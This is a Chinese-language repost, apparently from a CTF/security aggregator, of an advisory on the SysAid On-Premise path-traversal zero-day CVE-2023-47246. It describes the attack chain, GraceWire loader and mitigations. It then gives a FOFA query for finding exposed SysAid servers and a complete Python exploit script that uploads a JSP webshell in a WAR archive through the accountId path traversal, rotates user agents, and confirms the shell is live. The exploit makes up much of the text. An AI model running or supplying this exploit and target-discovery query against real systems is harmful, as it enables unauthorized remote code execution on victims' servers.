CTF导航 CTF导航

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

渗透技巧 12个月前 admin
132 0 0

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

介绍

2023 年 11 月 8 日,SysAid 发布了CVE-2023-47246 的通报,涉及其 SysAid On-Premise 软件上的严重零日漏洞。SysAid 将该漏洞描述为导致同一软件执行代码的路径遍历漏洞。该博客包括针对 SysAid On-Premise 软件客户的即时建议、针对此类漏洞的长期防护的最佳实践以及对攻击链的简要分析。

建议

SysAid 建议使用本地软件的客户执行以下两项操作:

  • 升级至版本23.3.6

  • 执行完整的系统和网络评估以检测潜在的危害

如果发现任何妥协迹象 (IoC),Zscaler 建议 SysAid On-Premise 客户遵循事件响应协议并立即采取行动。此外,Zscaler 强烈建议升级到最新版本。有关升级的更多信息,请访问此处和此处。

起因

据信,Lace Tempest (DEV-0950 / TA-505) 是利用此漏洞的威胁行为者。该组织今年早些时候负责利用MoveIT Transfer 漏洞,并与名为“CL0P”的勒索软件组织有关联。

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

图 1:描述威胁行为者利用 CVE-2023-47246 漏洞渗透 SysAid 系统的攻击链

可能的执行

怎么运行的

威胁行为者利用 SysAid CVE-2023-47246 路径遍历漏洞,成功将包含 WebShell 和各种有效负载的 WAR 存档上传到 SysAid Tomcat Web 服务的 Webroot 中。该漏洞位于SysAid com.ilient.server.UserEntry类的doPost方法中。利用此漏洞涉及操纵accountID参数以引入路径遍历,从而允许攻击者确定易受攻击的服务器上编写 WebShell 的位置。该攻击是通过发送 POST 请求来执行的,该请求带有压缩的 WAR 文件,其中包含 WebShell 作为请求正文。随后,威胁参与者获得对 WebShell 的访问权限,使他们能够与受感染的系统进行交互。

用于执行 GraceWire 的 PowerShell

威胁参与者利用未经授权的访问来部署 PowerShell 脚本,以在受害者的计算机上执行 GraceWire 加载程序。 

PowerShell 脚本(如下图所示)枚举C:Program FilesSysAidServertomcatwebappsusersfiles目录中列出的所有文件,然后检查以“Sophos”开头的防病毒或反恶意软件进程。如果脚本检测到受害者系统上运行的对抗性软件,则会退出以避免检测。

如果脚本未检测到防病毒或反恶意软件,则会在受害者的计算机上执行 GraceWire 加载程序 (user.exe)。

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

图 2:用于启动 GraceWire 加载程序的 PowerShell 脚本 (user.exe)

GraceWire 加载程序分析

GraceWire 加载程序遵循一系列步骤。首先,它检查是否存在名为<filename>.bin的文件,其中包含加密的有效负载。如果当前目录中存在该文件,则加载程序将继续使用ReadFile()函数读取其内容,并将数据存储在分配的内存中。随后,它解密加密信息并计算校验和。如果校验和被验证正确,程序将执行解密的bin有效负载。该有效负载旨在部署 GraceWire 木马。此外,加载程序会将 GraceWire 木马注入各种进程,包括:

  • spoolsv.exe

  • msiexec.exe

  • svchost.exe

在检查代码时,我们还发现了调试打印语句,显示了 GraceWire 加载程序的控制流。

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

图 3:调试打印语句的屏幕截图,展示了 GraceWire 加载程序的控制流程

摆脱证据

一旦渗透到受害者的系统中,威胁行为者就会使用另一个 PowerShell 脚本来系统地消除与其恶意活动相关的痕迹和证据。这种后利用策略旨在通过消除妥协指标 (IoC) 来消除数字足迹并最大程度地减少检测的可能性。

可能的其他利用

微软发布了一条推文,强调了 CL0P 勒索软件中此漏洞的利用情况,并强烈建议系统更新。 

此外,SysAid 还发现了支持证据,表明使用了以下 PowerShell 命令来下载和执行 CobaltStrike。

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

图 4:下载并执行 CobaltStrike 的 PowerShell 命令

最佳实践

  • 通过使用Zscaler Private Access限制横向移动来保护皇冠上的宝石应用程序,尤其是在应用程序安全模块打开的情况下。

  • 通过启用附加应用程序安全模块的 Zscaler Private Access 和Zscaler Internet Access路由所有服务器流量,这将提供正确的可见性来识别和阻止来自受感染系统/服务器的恶意活动。

  • 打开Zscaler 高级威胁防护以阻止所有已知的命令和控制域。如果对手利用此漏洞植入恶意软件,这将提供额外的保护。

  • 使用Zscaler 云防火墙(云 IPS 模块)将命令和控制保护扩展到所有端口和协议,包括新兴的 C2 目的地。同样,如果对手利用此漏洞植入恶意软件,这将提供额外的保护。

  • 使用Zscaler 云沙箱来防止作为第二阶段有效负载的一部分传递的未知恶意软件。

  • 确保您正在检查所有 SSL 流量。

  • 限制从允许的已知良好目的地列表到关键基础设施的流量。


FOFA

body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href="http://www.sysaid.com">by SysAid</a>"

https://github.com/W01fh4cker/CVE-2023-47246-EXP/blob/main/CVE-2023-47246-EXP.py

import argparseimport binasciiimport randomimport timeimport zipfileimport zlibimport urllib3import requests
urllib3.disable_warnings()
def compressFile(shellFile, warFile):    try:        with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:            zipf.write(shellFile)        zipf.close()        return True    except:        return False

def getHexData(warFile):    with open(warFile, 'rb') as warfile:        data = warfile.read()    warfile.close()    compressed_data = zlib.compress(data)    hex_data = binascii.hexlify(compressed_data).decode()    return hex_data

def generateRandomDirectoryName(num):    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'    return ''.join(random.choice(charset) for _ in range(num))

def get_random_agent():    agent_list = [        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',        'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50',        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7',        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',        'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',        'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/52.0.2743.84 Mobile/13G35 Safari/601.1.46',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'    ]    return agent_list[random.randint(0, len(agent_list) - 1)]

def shellUpload(url, proxy, directoryName, shellFile):    userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="    headers = {        "Content-Type": "application/x-www-form-urlencoded",        "User-Agent": get_random_agent()    }    shellFileName = shellFile.split(".")[0]    warFile = f"{shellFileName}.war"    if compressFile(shellFile, warFile):        shellHex = getHexData(warFile=warFile)        data = binascii.unhexlify(shellHex)        resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)        print("33[92m[+] Shell file compressed successfully!33[0m")        return resp    else:        print("33[91m[x] Shell file compression failed.33[0m")        exit(0)

def shellTest(url, proxy, directoryName, shellFile):    userEntryUrl = f"{url}/{directoryName}/{shellFile}"    headers = {        "User-Agent": get_random_agent()    }    resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False)    return resp, userEntryUrl
def exploit(url, proxy, shellFile):    print(f"33[94m[*] start to attack: {url}33[0m")    directoryName = generateRandomDirectoryName(5)    userentryResp = shellUpload(url, proxy, directoryName, shellFile)    print(f"33[94m[*] Wait 9 seconds...33[0m")    time.sleep(9)    cveTestResp, userEntryUrl = shellTest(url, proxy, directoryName, shellFile)    if userentryResp.status_code == 200 and cveTestResp.status_code == 200:        print(f"33[92m[+] The website [{url}] has vulnerability CVE-2023-47246! Shell path: {userEntryUrl}33[0m")    else:        print(f"33[91m[x] The website [{url}] has no vulnerability CVE-2023-47246.33[0m")

if __name__ == "__main__":    banner = """  ______     _______     ____   ___ ____  _____       _  _ _____ ____  _  _    __    / ___    / / ____|   |___  / _ ___ |___ /      | || |___  |___ | || |  / /_  | |      / /|  _| _____ __) | | | |__) | |_  _____| || |_ / /  __) | || |_| '_  | |___   V / | |__|_____/ __/| |_| / __/ ___) |_____|__   _/ /  / __/|__   _| (_) | ____|  _/  |_____|   |_____|___/_____|____/         |_|/_/  |_____|  |_|  ___/                                                                                 Author: W01fh4cker                                                                                Blog: https://w01fh4cker.github.io        """    print(banner)    parser = argparse.ArgumentParser(description="SysAid Server remote code execution vulnerability CVE-2023-47246 Written By W01fh4cker",        add_help="eg: python CVE-2023-47246-RCE.py -u https://192.168.149.150:8443")    parser.add_argument("-u", "--url", help="target URL")    parser.add_argument("-p", "--proxy", help="proxy, eg: http://127.0.0.1:7890")    parser.add_argument("-f", "--file", help="shell file, eg: shell.jsp")    args = parser.parse_args()    if args.url.endswith("/"):        url = args.url[:-1]    else:        url = args.url    if args.proxy:        proxy = {            'http': args.proxy,            'https': args.proxy        }    else:        proxy = {}    exploit(url, proxy, args.file)

感谢您抽出

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

.

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

.

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

来阅读本文

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

点它,分享点赞在看都在这里

原文始发于微信公众号(Ots安全):CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

版权声明:admin 发表于 2023年11月18日 下午1:59。
转载请注明:CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP) | CTF导航

相关文章

JSON Web 令牌漏洞和利用
admin
563
powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)
admin
1,481
验证码安全问题
admin
128
Apache OFBiz 命令执行漏洞分析
admin
98
Follina 补了?IE 凉了?花几分钟再弹个计算器
admin
633
内存Dump数据库密码的补充
admin
936

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0